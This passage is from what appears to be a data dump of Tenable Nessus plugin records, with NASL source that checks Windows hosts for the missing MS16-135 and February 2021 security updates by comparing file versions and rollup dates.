a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-135\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-135';\nkbs = make_list(\n '3198234',\n '3194371',\n '3197867',\n '3197868',\n '3197873',\n '3197874',\n '3197876',\n '3197877',\n '3198585',\n '3198586',\n '3200970'\n\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24029\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19706\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.24021\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.19698\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197873, 3197874)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197876, 3197877)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197867, 3197868)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198585)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198586)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3200970))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24083, CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601354: Windows 10 Version 1803 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601354.NASL", "href": "https://www.tenable.com/plugins/nessus/146339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146339);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601354\");\n script_xref(name:\"MSFT\", value:\"MS21-4601354\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601354: Windows 10 Version 1803 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24083,\n CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601354-os-build-17134-2026-04614869-9ce5-cc3b-655a-bc66eb7cb4b0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbcfd44b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601354.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601354');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601354])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:16", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 